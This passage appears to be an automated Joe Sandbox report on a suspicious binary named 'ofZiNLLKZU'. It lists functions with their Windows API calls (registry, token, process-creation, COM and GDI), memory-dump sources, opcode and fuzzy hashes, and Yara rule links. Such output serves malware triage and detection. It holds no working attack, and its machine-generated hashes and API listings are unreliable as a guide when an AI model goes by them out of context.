                                                                                Function 0065BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                  • Part of subcall function 0065C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0065B6AE,?,?), ref: 0065C9B5
                                                                                  • Part of subcall function 0065C998: _wcslen.LIBCMT ref: 0065C9F1
                                                                                  • Part of subcall function 0065C998: _wcslen.LIBCMT ref: 0065CA68
                                                                                  • Part of subcall function 0065C998: _wcslen.LIBCMT ref: 0065CA9E
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0065BCCA
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0065BD25
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0065BD6A
                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0065BD99
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0065BDF3
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0065BDFF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                • String ID:
                                                                                • API String ID: 1120388591-0
                                                                                • Opcode ID: 8b873298e1c26606b2389e774da672e15929f96fb27a597d67992834816b874d
                                                                                • Instruction ID: 90717f580070b5087ecc495569b5793ab5a77f6dd27b7b05b68a0a3dcbd5b646
                                                                                • Opcode Fuzzy Hash: 8b873298e1c26606b2389e774da672e15929f96fb27a597d67992834816b874d
                                                                                • Instruction Fuzzy Hash: BA818E30208241AFD714DF24C895E6ABBF6FF84348F14955DF8954B2A2DB32ED49CB92
                                                                                Function 0062F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(00000035), ref: 0062F7B9
                                                                                • SysAllocString.OLEAUT32(00000001), ref: 0062F860
                                                                                • VariantCopy.OLEAUT32(0062FA64,00000000), ref: 0062F889
                                                                                • VariantClear.OLEAUT32(0062FA64), ref: 0062F8AD
                                                                                • VariantCopy.OLEAUT32(0062FA64,00000000), ref: 0062F8B1
                                                                                • VariantClear.OLEAUT32(?), ref: 0062F8BB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearCopy$AllocInitString
                                                                                • String ID:
                                                                                • API String ID: 3859894641-0
                                                                                • Opcode ID: 0c9f5426332adb9f5583ca6dd45e21db4eb306ef774b91018f558cbafa3c69fb
                                                                                • Instruction ID: 7bb365b6bc5c4d5e3b1e8e223da07e336485de1b475d1c2ed98d94b2afc7e056
                                                                                • Opcode Fuzzy Hash: 0c9f5426332adb9f5583ca6dd45e21db4eb306ef774b91018f558cbafa3c69fb
                                                                                • Instruction Fuzzy Hash: 1E51D431A00721BADF24AB65E895B29B7F6EF45310B20947BE805DF291DB708C81CF97
                                                                                Function 0064910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D7620: _wcslen.LIBCMT ref: 005D7625
                                                                                  • Part of subcall function 005D6B57: _wcslen.LIBCMT ref: 005D6B6A
                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 006494E5
                                                                                • _wcslen.LIBCMT ref: 00649506
                                                                                • _wcslen.LIBCMT ref: 0064952D
                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00649585
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$FileName$OpenSave
                                                                                • String ID: X
                                                                                • API String ID: 83654149-3081909835
                                                                                • Opcode ID: 7c8cd5d6f32badda8102c125b3059dd9bdf182154919f3cad341a202e2743441
                                                                                • Instruction ID: c637af5dc139c5800561f8cd8a86c7c30feebbb1cbbe201fbd6070cdfbbe775d
                                                                                • Opcode Fuzzy Hash: 7c8cd5d6f32badda8102c125b3059dd9bdf182154919f3cad341a202e2743441
                                                                                • Instruction Fuzzy Hash: 31E160316043419FD724DF24C485A6BBBE5BFC5314F14896EE8899B3A2EB31DD05CBA2
                                                                                Function 005E920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005E9BB2
                                                                                • BeginPaint.USER32(?,?,?), ref: 005E9241
                                                                                • GetWindowRect.USER32(?,?), ref: 005E92A5
                                                                                • ScreenToClient.USER32(?,?), ref: 005E92C2
                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 005E92D3
                                                                                • EndPaint.USER32(?,?,?,?,?), ref: 005E9321
                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 006271EA
                                                                                  • Part of subcall function 005E9339: BeginPath.GDI32(00000000), ref: 005E9357
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                • String ID:
                                                                                • API String ID: 3050599898-0
                                                                                • Opcode ID: 68cdb164c9f83ba8dbf1b83840145f7f4d40fa02a924c9085a8e98052bbdbaf6
                                                                                • Instruction ID: ccdd1c802e7a99467236d6d3355f9912ba173fbb59ab3c15e8265231a3e1d0a1
                                                                                • Opcode Fuzzy Hash: 68cdb164c9f83ba8dbf1b83840145f7f4d40fa02a924c9085a8e98052bbdbaf6
                                                                                • Instruction Fuzzy Hash: 5C41A170104651AFD711DF25D888FBB7BAAFF4A320F140629F9A48B2E1C7719845DB62
                                                                                Function 006407EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0064080C
                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00640847
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00640863
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 006408DC
                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 006408F3
                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00640921
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3368777196-0
                                                                                • Opcode ID: 21c0cfb569bacbceb7958fa428ea67bf994798834592be82f3d31b43e735f82b
                                                                                • Instruction ID: 6df339346e293e0c8aeef1eec79c714b72b66a29d8b8ea8b10907594a653c0b1
                                                                                • Opcode Fuzzy Hash: 21c0cfb569bacbceb7958fa428ea67bf994798834592be82f3d31b43e735f82b
                                                                                • Instruction Fuzzy Hash: 1F417E71900205EFEF149F55DC85AAA7B7AFF44310F1440A5EE009E297DB70EE60DBA0
                                                                                Function 006681DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0062F3AB,00000000,?,?,00000000,?,0062682C,00000004,00000000,00000000), ref: 0066824C
                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00668272
                                                                                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 006682D1
                                                                                • ShowWindow.USER32(00000000,00000004), ref: 006682E5
                                                                                • EnableWindow.USER32(00000000,00000001), ref: 0066830B
                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0066832F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 642888154-0
                                                                                • Opcode ID: 4327852f2f147358dfe4da34a10242dde631cb513f9fe01affa4153dcfd40f13
                                                                                • Instruction ID: ca258019e13cc1bcd160fc87b0a34c4b1a59a88d5ee1cf69eaa9e23fa111438e
                                                                                • Opcode Fuzzy Hash: 4327852f2f147358dfe4da34a10242dde631cb513f9fe01affa4153dcfd40f13
                                                                                • Instruction Fuzzy Hash: BF41D230601640AFDB21CF25C8A9BE47BE7BB0A714F1813A9E5485F3A2CB31A941CF80
                                                                                Function 00634C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 00634C95
                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00634CB2
                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00634CEA
                                                                                • _wcslen.LIBCMT ref: 00634D08
                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00634D10
                                                                                • _wcsstr.LIBVCRUNTIME ref: 00634D1A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                • String ID:
                                                                                • API String ID: 72514467-0
                                                                                • Opcode ID: 22e50b239481eae1465c3c62143a1478e581eb2c8e84a5293c6d47346a3fdb39
                                                                                • Instruction ID: 5833e26f9e1cd936dd1ad0120a19210ec5c99c8db774520a34d3e7bfb2b56c7d
                                                                                • Opcode Fuzzy Hash: 22e50b239481eae1465c3c62143a1478e581eb2c8e84a5293c6d47346a3fdb39
                                                                                • Instruction Fuzzy Hash: 0A210B716042457BEB155B35EC49E7BBF9EDF45760F108039F805CA291DEA1EC0197E0
                                                                                Function 0064581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005D3A97,?,?,005D2E7F,?,?,?,00000000), ref: 005D3AC2
                                                                                • _wcslen.LIBCMT ref: 0064587B
                                                                                • CoInitialize.OLE32(00000000), ref: 00645995
                                                                                • CoCreateInstance.OLE32(0066FCF8,00000000,00000001,0066FB68,?), ref: 006459AE
                                                                                • CoUninitialize.OLE32 ref: 006459CC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                • String ID: .lnk
                                                                                • API String ID: 3172280962-24824748
                                                                                • Opcode ID: fb5dffc7e4ba5ba9260e0c6bd0a38e8228a0341e45b95c98649befef75c91e72
                                                                                • Instruction ID: 9868eee92c850c22dde38ac825a6e70be58184f85113fe46a04434c14769e53b
                                                                                • Opcode Fuzzy Hash: fb5dffc7e4ba5ba9260e0c6bd0a38e8228a0341e45b95c98649befef75c91e72
                                                                                • Instruction Fuzzy Hash: 19D144716087029FC714DF18C49496ABBE6FF89710F14895EF88A9B362DB31EC45CB92
                                                                                Function 0063175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00630FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00630FCA
                                                                                  • Part of subcall function 00630FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00630FD6
                                                                                  • Part of subcall function 00630FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00630FE5
                                                                                  • Part of subcall function 00630FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00630FEC
                                                                                  • Part of subcall function 00630FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00631002
                                                                                • GetLengthSid.ADVAPI32(?,00000000,00631335), ref: 006317AE
                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 006317BA
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 006317C1
                                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 006317DA
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00631335), ref: 006317EE
                                                                                • HeapFree.KERNEL32(00000000), ref: 006317F5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                • String ID:
                                                                                • API String ID: 3008561057-0
                                                                                • Opcode ID: 4cdc51e99e0b42724650c36ff13ddc73b7de70071786c1a83f12facb9d5e0a48
                                                                                • Instruction ID: 7160b8d89f6d4ba17aeacc6f1e695f3c2a8be3da307e299e663d51db56f75380
                                                                                • Opcode Fuzzy Hash: 4cdc51e99e0b42724650c36ff13ddc73b7de70071786c1a83f12facb9d5e0a48
                                                                                • Instruction Fuzzy Hash: DA118E31500605FFDB209FA4CC49BFEBBBAEB46365F185018F4819B210D776AA44DBB0
                                                                                Function 006314CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006314FF
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00631506
                                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00631515
                                                                                • CloseHandle.KERNEL32(00000004), ref: 00631520
                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0063154F
                                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00631563
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                • String ID:
                                                                                • API String ID: 1413079979-0
                                                                                • Opcode ID: f84822a28050ca4c807d3a60bd2dd25fcb770817b2eecd91094e4aa4c271f558
                                                                                • Instruction ID: d8cbfc86c92fb98c4d167caf003573862625f480c056da195baf996cbc265de1
                                                                                • Opcode Fuzzy Hash: f84822a28050ca4c807d3a60bd2dd25fcb770817b2eecd91094e4aa4c271f558
                                                                                • Instruction Fuzzy Hash: B611597250020DABDF11CF99DD49FEE7BAAEF49754F045015FA05A6160C3B28E61DBA0
                                                                                Function 005F3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,005F3379,005F2FE5), ref: 005F3390
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005F339E
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005F33B7
                                                                                • SetLastError.KERNEL32(00000000,?,005F3379,005F2FE5), ref: 005F3409
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                • Opcode ID: 76b3d82c91171f7188c78df3cf51e6c39ad29ae60d4e90b9b91a30da0c128b25
                                                                                • Instruction ID: 7e5ce1e1333e9dda63220e6135a432385d4013021dffca34559284ee39dddb89
                                                                                • Opcode Fuzzy Hash: 76b3d82c91171f7188c78df3cf51e6c39ad29ae60d4e90b9b91a30da0c128b25
                                                                                • Instruction Fuzzy Hash: 3F01243320831ABEFB253B747C9DA372E99FB45379B20062AF710812F0EF5A4D129544
                                                                                Function 00602D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,00605686,00613CD6,?,00000000,?,00605B6A,?,?,?,?,?,005FE6D1,?,00698A48), ref: 00602D78
                                                                                • _free.LIBCMT ref: 00602DAB
                                                                                • _free.LIBCMT ref: 00602DD3
                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,005FE6D1,?,00698A48,00000010,005D4F4A,?,?,00000000,00613CD6), ref: 00602DE0
                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,005FE6D1,?,00698A48,00000010,005D4F4A,?,?,00000000,00613CD6), ref: 00602DEC
                                                                                • _abort.LIBCMT ref: 00602DF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free$_abort
                                                                                • String ID:
                                                                                • API String ID: 3160817290-0
                                                                                • Opcode ID: 50ca94614eb54eee734dd28adaaec77e4e7016253e4d6fa79871b4b07b2c831a
                                                                                • Instruction ID: 4287210a165e0f2145913a9b1312458badbdadb4af0f86d4415fd175c56a0bb7
                                                                                • Opcode Fuzzy Hash: 50ca94614eb54eee734dd28adaaec77e4e7016253e4d6fa79871b4b07b2c831a
                                                                                • Instruction Fuzzy Hash: A9F0F9315C490267C75A37396C2EA5B265FAFC1775B21041DF424923D2EE209C015124
                                                                                Function 00668A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005E9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005E9693
                                                                                  • Part of subcall function 005E9639: SelectObject.GDI32(?,00000000), ref: 005E96A2
                                                                                  • Part of subcall function 005E9639: BeginPath.GDI32(?), ref: 005E96B9
                                                                                  • Part of subcall function 005E9639: SelectObject.GDI32(?,00000000), ref: 005E96E2
                                                                                • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00668A4E
                                                                                • LineTo.GDI32(?,00000003,00000000), ref: 00668A62
                                                                                • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00668A70
                                                                                • LineTo.GDI32(?,00000000,00000003), ref: 00668A80
                                                                                • EndPath.GDI32(?), ref: 00668A90
                                                                                • StrokePath.GDI32(?), ref: 00668AA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                • String ID:
                                                                                • API String ID: 43455801-0
                                                                                • Opcode ID: bdf2a59db21572abf3f5059dea653c1e9c2b8f8d619fe83c7ec9a2e104be0085
                                                                                • Instruction ID: e980d065ddff0869e5fac97efccf76b94fc4620d73ac69acbe524ffe4de40518
                                                                                • Opcode Fuzzy Hash: bdf2a59db21572abf3f5059dea653c1e9c2b8f8d619fe83c7ec9a2e104be0085
                                                                                • Instruction Fuzzy Hash: 7511CC7600014DFFDF119F94DC48EAA7F6EEB09364F048012FA559A161C7729D55DFA0
                                                                                Function 006351FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 00635218
                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00635229
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00635230
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00635238
                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0063524F
                                                                                • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00635261
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
